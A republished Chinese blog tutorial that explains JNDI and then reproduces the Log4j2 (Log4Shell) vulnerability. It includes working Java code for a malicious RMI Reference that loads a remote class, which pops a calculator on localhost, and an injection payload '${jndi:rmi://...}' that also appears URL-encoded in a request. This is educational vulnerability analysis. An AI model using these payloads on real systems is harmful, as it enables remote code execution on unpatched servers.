[[439999]]

本文轉(zhuǎn)載自微信公眾號(hào)「程序新視界」，作者二師兄。轉(zhuǎn)載本文請(qǐng)聯(lián)系程序新視界公眾號(hào)。

背景

最近互聯(lián)網(wǎng)技術(shù)圈最火的一件事莫過(guò)于Log4j2的漏洞了。同時(shí)也涌現(xiàn)出了各類分析文章，關(guān)于漏洞的版本、漏洞的原因、漏洞的修復(fù)、程序員因此加班等等。

經(jīng)?？次椅恼碌呐笥讯贾溃鎸?duì)這樣熱門有意思的技術(shù)點(diǎn)，怎能錯(cuò)過(guò)深入分析一波呢?大概你也已經(jīng)聽說(shuō)了，造成漏洞的”罪魁禍?zhǔn)?ldquo;是JNDI，今天我們就聊它。

JNDI，好熟悉，但……熟悉的陌生人?JNDI到底是個(gè)什么鬼?好吧，如果你已經(jīng)有一兩年的編程經(jīng)驗(yàn)，但還不了解JNDI，甚至沒(méi)聽說(shuō)過(guò)。那么，要么趕緊換工作，要么趕緊讀讀這篇文章。

JNDI是個(gè)什么鬼?

說(shuō)起JNDI，從事Java EE編程的人應(yīng)該都在用著，但知不知道自己在用，那就看你對(duì)技術(shù)的鉆研深度了。這次Log4j2曝出漏洞，不正說(shuō)明大量項(xiàng)目或直接或間接的在用著JNDI。來(lái)看看JNDI到底是個(gè)什么鬼吧?

先來(lái)看看Sun官方的解釋：

Java命名和目錄接口(Java Naming and Directory Interface ，JNDI)是用于從Java應(yīng)用程序中訪問(wèn)名稱和目錄服務(wù)的一組API。命名服務(wù)即將名稱與對(duì)象相關(guān)聯(lián)，以便能通過(guò)相應(yīng)名稱訪問(wèn)這些對(duì)象。而目錄服務(wù)即其對(duì)象具有屬性及名稱的命名服務(wù)。

命名或目錄服務(wù)允許你集中管理共享信息的存儲(chǔ)，這在網(wǎng)絡(luò)應(yīng)用程序中很重要，因?yàn)樗梢允惯@類應(yīng)用程序更加一致和易于管理。例如，可以將打印機(jī)配置存儲(chǔ)在目錄服務(wù)中，這樣所有與打印機(jī)相關(guān)的應(yīng)用程序都能夠使用它。

概念是不是很抽象，讀了好幾遍都沒(méi)懂?一圖勝千言：

naming_service

看著怎么有點(diǎn)注冊(cè)中心的意思?是的，如果你使用過(guò)Nacos或讀過(guò)Nacos的源碼，Naming Service這個(gè)概念一定很熟悉。在JNDI中，雖然實(shí)現(xiàn)方式不同、應(yīng)用場(chǎng)景不同，但并不影響你通過(guò)類比注冊(cè)中心的方式來(lái)理解JNDI。

如果你說(shuō)沒(méi)用過(guò)Nacos，那好，Map總用過(guò)吧。忽略掉JNDI與Map底層實(shí)現(xiàn)的區(qū)別，JNDI提供了一個(gè)類似Map的綁定功能，然后又提供了基于lookup或search之類的方法來(lái)根據(jù)名稱查找Object，好比Map的get方法。

總之，JNDI就是一個(gè)規(guī)范，規(guī)范就需要對(duì)應(yīng)的API(也就是一些Java類)來(lái)實(shí)現(xiàn)。通過(guò)這組API，可以將Object(對(duì)象)和一個(gè)名稱進(jìn)行關(guān)聯(lián)，同時(shí)提供了基于名稱查找Object的途徑。

最后，對(duì)于JNDI，SUN公司只是提供了一個(gè)接口規(guī)范，具體由對(duì)應(yīng)的服務(wù)器來(lái)實(shí)現(xiàn)。比如，Tomcat有Tomcat的實(shí)現(xiàn)方式，JBoss有JBoss的實(shí)現(xiàn)方式，遵守規(guī)范就好。

命名服務(wù)與目錄服務(wù)的區(qū)別

命名服務(wù)就是上面提到的，類似Map的綁定與查找功能。比如：在Internet中的域名服務(wù)(domain naming service，DNS)，就是提供將域名映射到IP地址的命名服務(wù)，在瀏覽器中輸入域名，通過(guò)DNS找到相應(yīng)的IP地址，然后訪問(wèn)網(wǎng)站。

目錄服務(wù)是對(duì)命名服務(wù)的擴(kuò)展，是一種特殊的命名服務(wù)，提供了屬性與對(duì)象的關(guān)聯(lián)和查找。一個(gè)目錄服務(wù)通常擁有一個(gè)命名服務(wù)(但是一個(gè)命名服務(wù)不必具有一個(gè)目錄服務(wù))。比如電話簿就是一個(gè)典型的目錄服務(wù)，一般先在電話簿里找到相關(guān)的人名，再找到這個(gè)人的電話號(hào)碼。

目錄服務(wù)允許屬性(比如用戶的電子郵件地址)與對(duì)象相關(guān)聯(lián)(而命名服務(wù)則不然)。這樣，使用目錄服務(wù)時(shí)，可以基于對(duì)象的屬性來(lái)搜索它們。

JNDI架構(gòu)分層

JNDI通常分為三層：

• JNDI API：用于與Java應(yīng)用程序與其通信，這一層把應(yīng)用程序和實(shí)際的數(shù)據(jù)源隔離開來(lái)。因此無(wú)論應(yīng)用程序是訪問(wèn)LDAP、RMI、DNS還是其他的目錄服務(wù)，跟這一層都沒(méi)有關(guān)系。
• Naming Manager：也就是我們提到的命名服務(wù);
• JNDI SPI(Server Provider Interface)：用于具體到實(shí)現(xiàn)的方法上。

整體架構(gòu)分層如下圖：

JNDI架構(gòu)

需要注意的是：JNDI同時(shí)提供了應(yīng)用程序編程接口(Application Programming Interface ，API)和服務(wù)提供程序接口(Service Provider Interface ，SPI)。

這樣做對(duì)于與命名或目錄服務(wù)交互的應(yīng)用程序來(lái)說(shuō)，必須存在一個(gè)用于該服務(wù)的JNDI服務(wù)提供程序，這便是JNDI SPI發(fā)揮作用的舞臺(tái)。

一個(gè)服務(wù)提供程序基本上就是一組類，對(duì)特定的命名和目錄服務(wù)實(shí)現(xiàn)了各種JNDI接口——這與JDBC驅(qū)動(dòng)程序針對(duì)特定的數(shù)據(jù)系統(tǒng)實(shí)現(xiàn)各種JDBC接口極為相似。作為開發(fā)人員，不需要擔(dān)心JNDI SPI。只需確保為每個(gè)要使用的命名或目錄服務(wù)提供了一個(gè)服務(wù)提供程序即可。

JNDI的應(yīng)用

下面再了解一下JNDI容器的概念及應(yīng)用場(chǎng)景。

JNDI容器環(huán)境

JNDI中的命名(Naming)，就是將Java對(duì)象以某個(gè)名稱的形式綁定(binding)到一個(gè)容器環(huán)境(Context)中。當(dāng)使用時(shí)，調(diào)用容器環(huán)境(Context)的查找(lookup)方法找出某個(gè)名稱所綁定的Java對(duì)象。

容器環(huán)境(Context)本身也是一個(gè)Java對(duì)象，它也可以通過(guò)一個(gè)名稱綁定到另一個(gè)容器環(huán)境(Context)中。將一個(gè)Context對(duì)象綁定到另外一個(gè)Context對(duì)象中，這就形成了一種父子級(jí)聯(lián)關(guān)系，多個(gè)Context對(duì)象最終可以級(jí)聯(lián)成一種樹狀結(jié)構(gòu)，樹中的每個(gè)Context對(duì)象中都可以綁定若干個(gè)Java對(duì)象。

jndi-context-tree

JNDI 應(yīng)用

JNDI的基本使用操作就是：先創(chuàng)建一個(gè)對(duì)象，然后放到容器環(huán)境中，使用的時(shí)候再拿出來(lái)。

此時(shí)，你是否疑惑，干嘛這么費(fèi)勁呢?換句話說(shuō)，這么費(fèi)勁能帶來(lái)什么好處呢?

在真實(shí)應(yīng)用中，通常是由系統(tǒng)程序或框架程序先將資源對(duì)象綁定到JNDI環(huán)境中，后續(xù)在該系統(tǒng)或框架中運(yùn)行的模塊程序就可以從JNDI環(huán)境中查找這些資源對(duì)象了。

關(guān)于JDNI與我們實(shí)踐相結(jié)合的一個(gè)例子是JDBC的使用。在沒(méi)有基于JNDI實(shí)現(xiàn)時(shí)，連接一個(gè)數(shù)據(jù)庫(kù)通常需要：加載數(shù)據(jù)庫(kù)驅(qū)動(dòng)程序、連接數(shù)據(jù)庫(kù)、操作數(shù)據(jù)庫(kù)、關(guān)閉數(shù)據(jù)庫(kù)等步驟。而不同的數(shù)據(jù)庫(kù)在對(duì)上述步驟的實(shí)現(xiàn)又有所不同，參數(shù)也可能發(fā)生變化。

如果把這些問(wèn)題交由J2EE容器來(lái)配置和管理，程序就只需對(duì)這些配置和管理進(jìn)行引用就可以了。

以Tomcat服務(wù)器為例，在啟動(dòng)時(shí)可以創(chuàng)建一個(gè)連接到某種數(shù)據(jù)庫(kù)系統(tǒng)的數(shù)據(jù)源(DataSource)對(duì)象，并將該數(shù)據(jù)源(DataSource)對(duì)象綁定到JNDI環(huán)境中，以后在這個(gè)Tomcat服務(wù)器中運(yùn)行的Servlet和JSP程序就可以從JNDI環(huán)境中查詢出這個(gè)數(shù)據(jù)源(DataSource)對(duì)象進(jìn)行使用，而不用關(guān)心數(shù)據(jù)源(DataSource)對(duì)象是如何創(chuàng)建出來(lái)的。

JNDI-Tree

這種方式極大地增強(qiáng)了系統(tǒng)的可維護(hù)性，即便當(dāng)數(shù)據(jù)庫(kù)系統(tǒng)的連接參數(shù)發(fā)生變更時(shí)，也與應(yīng)用程序開發(fā)人員無(wú)關(guān)。JNDI將一些關(guān)鍵信息放到內(nèi)存中，可以提高訪問(wèn)效率;通過(guò) JNDI可以達(dá)到解耦的目的，讓系統(tǒng)更具可維護(hù)性和可擴(kuò)展性。

JNDI實(shí)戰(zhàn)

有了以上的概念和基礎(chǔ)知識(shí)，現(xiàn)在可以開始實(shí)戰(zhàn)了。

在架構(gòu)圖中，JNDI的實(shí)現(xiàn)層中包含了多種實(shí)現(xiàn)方式，這里就基于其中的RMI實(shí)現(xiàn)來(lái)寫個(gè)實(shí)例體驗(yàn)一把。

基于RMI的實(shí)現(xiàn)

RMI是Java中的遠(yuǎn)程方法調(diào)用，基于Java的序列化和反序列化傳遞數(shù)據(jù)。

可以通過(guò)如下代碼來(lái)搭建一個(gè)RMI服務(wù)：

// ①定義接口 
public interface RmiService extends Remote { 
 String sayHello() throws RemoteException; 
} 
 
// ②接口實(shí)現(xiàn) 
public class MyRmiServiceImpl extends UnicastRemoteObject implements RmiService { 
 protected MyRmiServiceImpl() throws RemoteException { 
 } 
 
 @Override 
 public String sayHello() throws RemoteException { 
  return "Hello World!"; 
 } 
} 
 
// ③服務(wù)綁定并啟動(dòng)監(jiān)聽 
public class RmiServer { 
 
 public static void main(String[] args) throws Exception { 
  Registry registry = LocateRegistry.createRegistry(1099); 
  System.out.println("RMI啟動(dòng)，監(jiān)聽：1099 端口"); 
  registry.bind("hello", new MyRmiServiceImpl()); 
  Thread.currentThread().join(); 
 } 
} 

上述代碼先定義了一個(gè)RmiService的接口，該接口實(shí)現(xiàn)了Remote，并對(duì)RmiService接口進(jìn)行了實(shí)現(xiàn)。在實(shí)現(xiàn)的過(guò)程中繼承了UnicastRemoteObject的具體服務(wù)實(shí)現(xiàn)類。

最后，在RmiServer中通過(guò)Registry監(jiān)聽1099端口，并將RmiService接口的實(shí)現(xiàn)類進(jìn)行了綁定。

下面構(gòu)建客戶端訪問(wèn)：

public class RmiClient { 
 
 public static void main(String[] args) throws Exception { 
  Hashtable env = new Hashtable(); 
  env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); 
  env.put(Context.PROVIDER_URL, "rmi://localhost:1099"); 
  Context ctx = new InitialContext(env); 
  RmiService service = (RmiService) ctx.lookup("hello"); 
  System.out.println(service.sayHello()); 
 } 
} 

其中，提供了兩個(gè)參數(shù)Context.INITIAL_CONTEXT_FACTORY、Context.PROVIDER_URL，分別表示Context初始化的工廠方法和提供服務(wù)的url。

執(zhí)行上述程序，就可以獲得遠(yuǎn)程端的對(duì)象并調(diào)用，這樣就實(shí)現(xiàn)了RMI的通信。當(dāng)然，這里Server和Client在同一臺(tái)機(jī)器，就用了”localhost“的，如果是遠(yuǎn)程服務(wù)器，則替換成對(duì)應(yīng)的IP即可。

構(gòu)建攻擊

常規(guī)來(lái)說(shuō)，如果要構(gòu)建攻擊，只需偽造一個(gè)服務(wù)器端，返回惡意的序列化Payload，客戶端接收之后觸發(fā)反序列化。但實(shí)際上對(duì)返回的類型是有一定的限制的。

在JNDI中，有一個(gè)更好利用的方式，涉及到命名引用的概念javax.naming.Reference。

如果一些本地實(shí)例類過(guò)大，可以選擇一個(gè)遠(yuǎn)程引用，通過(guò)遠(yuǎn)程調(diào)用的方式，引用遠(yuǎn)程的類。這也就是JNDI利用Payload還會(huì)涉及HTTP服務(wù)的原因。

RMI服務(wù)只會(huì)返回一個(gè)命名引用，告訴JNDI應(yīng)用該如何去尋找這個(gè)類，然后應(yīng)用則會(huì)去HTTP服務(wù)下找到對(duì)應(yīng)類的class文件并加載。此時(shí)，只要將惡意代碼寫入static方法中，則會(huì)在類加載時(shí)被執(zhí)行。

基本流程如下：

RMI攻擊流程

修改RmiServer的代碼實(shí)現(xiàn)：

public class RmiServer { 
 
 public static void main(String[] args) throws Exception { 
  System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 
  Registry registry = LocateRegistry.createRegistry(1099); 
  System.out.println("RMI啟動(dòng)，監(jiān)聽：1099 端口"); 
  Reference reference = new Reference("Calc", "Calc", "http://127.0.0.1:8000/"); 
  ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 
  registry.bind("hello", referenceWrapper); 
 
  Thread.currentThread().join(); 
 } 
} 

由于采用的Java版本較高，需先將系統(tǒng)變量com.sun.jndi.rmi.object.trustURLCodebase設(shè)置為true。

其中綁定的Reference涉及三個(gè)變量：

• className：遠(yuǎn)程加載時(shí)所使用的類名，如果本地找不到這個(gè)類名，就去遠(yuǎn)程加載;
• classFactory：遠(yuǎn)程的工廠類;
• classFactoryLocation：工廠類加載的地址，可以是file://、ftp://、http:// 等協(xié)議;

此時(shí)，通過(guò)Python啟動(dòng)一個(gè)簡(jiǎn)單的HTTP監(jiān)聽服務(wù)：

192:~ zzs$ python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ... 

打印日志，說(shuō)明在8000端口進(jìn)行了http的監(jiān)聽。

對(duì)應(yīng)的客戶端代碼修改為如下：

public class RmiClient { 
 
 public static void main(String[] args) throws Exception { 
  System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 
  Hashtable env = new Hashtable(); 
  env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); 
  env.put(Context.PROVIDER_URL, "rmi://localhost:1099"); 
  Context ctx = new InitialContext(env); 
  ctx.lookup("hello"); 
 } 
} 

執(zhí)行，客戶端代碼，發(fā)現(xiàn)Python監(jiān)聽的服務(wù)打印如下：

127.0.0.1 - - [12/Dec/2021 16:19:40] code 404, message File not found 
127.0.0.1 - - [12/Dec/2021 16:19:40] "GET /Calc.class HTTP/1.1" 404 - 

可見，客戶端已經(jīng)去遠(yuǎn)程加載惡意class(Calc.class)文件了，只不過(guò)Python服務(wù)并沒(méi)有返回對(duì)應(yīng)的結(jié)果而已。

進(jìn)一步改造

上述代碼證明了可以通過(guò)RMI的形式進(jìn)行攻擊，下面基于上述代碼和Spring Boot Web服務(wù)的形式進(jìn)一步演示。通過(guò)JNDI注入+RMI的形式調(diào)用起本地的計(jì)算器。

上述的基礎(chǔ)代碼不變，后續(xù)只微調(diào)RmiServer和RmiClient類，同時(shí)添加一些新的類和方法。

第一步：構(gòu)建攻擊類

創(chuàng)建一個(gè)攻擊類BugFinder，用于啟動(dòng)本地的計(jì)算器：

public class BugFinder { 
 
 public BugFinder() { 
  try { 
   System.out.println("執(zhí)行漏洞代碼"); 
   String[] commands = {"open", "/System/Applications/Calculator.app"}; 
   Process pc = Runtime.getRuntime().exec(commands); 
   pc.waitFor(); 
   System.out.println("完成執(zhí)行漏洞代碼"); 
  } catch (Exception e) { 
   e.printStackTrace(); 
  } 
 } 
 
 public static void main(String[] args) { 
  BugFinder bugFinder = new BugFinder(); 
 } 
 
} 

本人是Mac操作系統(tǒng)，代碼中就基于Mac的命令實(shí)現(xiàn)方式，通過(guò)Java命令調(diào)用Calculator.app。同時(shí)，當(dāng)該類被初始化時(shí)，會(huì)執(zhí)行啟動(dòng)計(jì)算器的命令。

將上述代碼進(jìn)行編譯，存放在一個(gè)位置，這里單獨(dú)copy出來(lái)放在了”/Users/zzs/temp/BugFinder.class“路徑，以備后用，這就是攻擊的惡意代碼了。

第二步：構(gòu)建Web服務(wù)器

Web服務(wù)用于RMI調(diào)用時(shí)返回攻擊類文件。這里采用Spring Boot項(xiàng)目，核心實(shí)現(xiàn)代碼如下：

@RestController 
public class ClassController { 
 
 @GetMapping(value = "/BugFinder.class") 
 public void getClass(HttpServletResponse response) { 
  String file = "/Users/zzs/temp/BugFinder.class"; 
  FileInputStream inputStream = null; 
  OutputStream os = null; 
  try { 
   inputStream = new FileInputStream(file); 
   byte[] data = new byte[inputStream.available()]; 
   inputStream.read(data); 
   os = response.getOutputStream(); 
   os.write(data); 
   os.flush(); 
  } catch (Exception e) { 
   e.printStackTrace(); 
  } finally { 
   // 省略流的判斷關(guān)閉； 
  } 
 } 
} 

在該Web服務(wù)中，會(huì)讀取BugFinder.class文件，并返回給RMI服務(wù)。重點(diǎn)提供了一個(gè)Web服務(wù)，能夠返回一個(gè)可執(zhí)行的class文件。

第三步：修改RmiServer

對(duì)RmiServer的綁定做一個(gè)修改：

public class RmiServer { 
 
 public static void main(String[] args) throws Exception { 
  System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 
  Registry registry = LocateRegistry.createRegistry(1099); 
  System.out.println("RMI啟動(dòng)，監(jiān)聽：1099 端口"); 
  Reference reference = new Reference("com.secbro.rmi.BugFinder", "com.secbro.rmi.BugFinder", "http://127.0.0.1:8080/BugFinder.class"); 
  ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 
  registry.bind("hello", referenceWrapper); 
 
  Thread.currentThread().join(); 
 } 
} 

這里Reference傳入的參數(shù)就是攻擊類及遠(yuǎn)程下載的Web地址。

第四步：執(zhí)行客戶端代碼

執(zhí)行客戶端代碼進(jìn)行訪問(wèn)：

public class RmiClient { 
 
 public static void main(String[] args) throws Exception { 
  System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 
  Hashtable env = new Hashtable(); 
  env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); 
  env.put(Context.PROVIDER_URL, "rmi://localhost:1099"); 
  Context ctx = new InitialContext(env); 
  ctx.lookup("hello"); 
 } 
} 

本地計(jì)算器被打開：

RMI Client

基于Log4j2的攻擊

上面演示了基本的攻擊模式，基于上述模式，我們?cè)賮?lái)看看Log4j2的漏洞攻擊。

在Spring Boot項(xiàng)目中引入了log4j2的受影響版本：

<dependency> 
 <groupId>org.springframework.boot</groupId> 
 <artifactId>spring-boot-starter-web</artifactId> 
 <exclusions><!-- 去掉springboot默認(rèn)配置 --> 
  <exclusion> 
   <groupId>org.springframework.boot</groupId> 
   <artifactId>spring-boot-starter-logging</artifactId> 
   </exclusion> 
  </exclusions> 
</dependency> 
 
<dependency> <!-- 引入log4j2依賴 --> 
   <groupId>org.springframework.boot</groupId> 
   <artifactId>spring-boot-starter-log4j2</artifactId> 
</dependency> 

 

這里需要注意，先排除掉Spring Boot默認(rèn)的日志，否則可能無(wú)法復(fù)現(xiàn)Bug。

修改一下RMI的Server代碼：

public class RmiServer { 
 
 public static void main(String[] args) throws Exception { 
  System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 
  Registry registry = LocateRegistry.createRegistry(1099); 
  System.out.println("RMI啟動(dòng)，監(jiān)聽：1099 端口"); 
  Reference reference = new Reference("com.secbro.rmi.BugFinder", "com.secbro.rmi.BugFinder", null); 
  ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 
  registry.bind("hello", referenceWrapper); 
  Thread.currentThread().join(); 
 } 
} 

這里直接訪問(wèn)BugFinder，JNDI綁定名稱為：hello。

客戶端引入Log4j2的API，然后記錄日志：

import org.apache.logging.log4j.LogManager; 
import org.apache.logging.log4j.Logger; 
 
public class RmiClient { 
 
 private static final Logger logger = LogManager.getLogger(RmiClient.class); 
 
 public static void main(String[] args) throws Exception { 
  System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 
  logger.error("${jndi:rmi://127.0.0.1:1099/hello}"); 
  Thread.sleep(5000); 
 } 
} 

日志中記錄的信息為“${jndi:rmi://127.0.0.1:1099/hello}”，也就是RMI Server的地址和綁定的名稱。

執(zhí)行程序，發(fā)現(xiàn)計(jì)算器被成功打開。

當(dāng)然，在實(shí)際應(yīng)用中，logger.error中記錄的日志信息，可能是通過(guò)參數(shù)獲得，比如在Spring Boot中定義如下代碼：

@RestController 
public class Log4jController { 
 
 private static final Logger logger = LogManager.getLogger(Log4jController.class); 
 
 /** 
  * 方便測(cè)試，用了get請(qǐng)求 
  * @param username 登錄名稱 
  */ 
 @GetMapping("/a") 
 public void log4j(String username){ 
  System.out.println(username); 
  // 打印登錄名稱 
  logger.info(username); 
 } 
} 

在瀏覽器中請(qǐng)求URL為：

http://localhost:8080/a?username=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A1099%2Fhello%7D 

其中username參數(shù)的值就是“${jndi:rmi://127.0.0.1:1099/hello}”經(jīng)過(guò)URLEncoder#encode編碼之后的值。此時(shí)，訪問(wèn)該URL地址，同樣可以將打開計(jì)算器。

至于Log4j2內(nèi)部邏輯漏洞觸發(fā)JNDI調(diào)用的部分就不再展開了，感興趣的朋友在上述實(shí)例上進(jìn)行debug即可看到完整的調(diào)用鏈路。

小結(jié)

本篇文章通過(guò)對(duì)Log4j2漏洞的分析，不僅帶大家了解了JNDI的基礎(chǔ)知識(shí)，而且完美重現(xiàn)了一次基于JNDI的工具。本文涉及到的代碼都是本人親自實(shí)驗(yàn)過(guò)的，強(qiáng)烈建議大家也跑一遍代碼，真切感受一下如何實(shí)現(xiàn)攻擊邏輯。

JNDI注入事件不僅在Log4j2中發(fā)生過(guò)，而且在大量其他框架中也有出現(xiàn)。雖然JDNI為我們帶來(lái)了便利，但同時(shí)也帶了風(fēng)險(xiǎn)。不過(guò)在實(shí)例中大家也看到在JDK的高版本中，不進(jìn)行特殊設(shè)置(com.sun.jndi.rmi.object.trustURLCodebase設(shè)置為true)，還是無(wú)法觸發(fā)漏洞的。這樣也多少讓人放心一些。

另外，如果你的系統(tǒng)中真的出現(xiàn)此漏洞，強(qiáng)烈建議馬上修復(fù)。在此漏洞未被報(bào)道之前，可能只有少數(shù)人知道。一旦眾人皆知，躍躍欲試的人就多了，趕緊防護(hù)起來(lái)吧。